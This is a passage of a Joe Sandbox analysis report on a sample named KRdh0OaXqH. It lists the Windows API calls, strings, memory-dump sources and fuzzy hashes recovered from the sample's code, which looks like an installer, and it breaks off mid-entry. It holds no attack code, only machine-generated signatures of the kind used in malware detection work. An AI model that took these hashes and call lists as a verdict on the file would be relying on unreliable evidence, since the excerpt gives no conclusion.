                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1631623395-0
                                                                                            • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                            • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                                            • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                                            • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004183A3
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                            • GetWindowRect.USER32(?), ref: 004183DC
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                            • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                            • String ID: ,
                                                                                            • API String ID: 2266315723-3772416878
                                                                                            • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                            • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                            • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                            • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                            • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                                            • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                                            • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CryptVersion
                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                            • API String ID: 1951258720-508647305
                                                                                            • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                            • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                                            • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                                            • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                                            • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                                            • String ID: isRS-$isRS-???.tmp
                                                                                            • API String ID: 134685335-3422211394
                                                                                            • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                            • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                                            • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                                            • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                                            • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                                            • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                            • API String ID: 2238633743-1050967733
                                                                                            • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                            • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                                            • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                                            • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                                            APIs
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                                            • SetForegroundWindow.USER32(?), ref: 00456841
                                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                                            Strings
                                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                            • API String ID: 2236967946-3182603685
                                                                                            • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                            • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                                            • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                                            • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                            • API String ID: 1646373207-3712701948
                                                                                            • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                            • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                                            • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                                            • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID: ,
                                                                                            • API String ID: 568898626-3772416878
                                                                                            • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                            • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                            • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                                            • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
                                                                                            • FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                            • Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
                                                                                            • Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                                            • Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
                                                                                            • FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                            • Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
                                                                                            • Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                                            • Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
                                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 1177325624-0
                                                                                            • Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                            • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                                            • Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                                            • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00481CEE
                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
                                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$IconicLong
                                                                                            • String ID:
                                                                                            • API String ID: 2754861897-0
                                                                                            • Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                            • Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
                                                                                            • Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                            • Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
                                                                                            • FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                            • Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
                                                                                            • Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                            • Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004241F4
                                                                                            • SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
                                                                                              • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                              • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021925AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
                                                                                            • SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                            • String ID:
                                                                                            • API String ID: 649377781-0
                                                                                            • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                            • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                                            • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                            • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D1F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
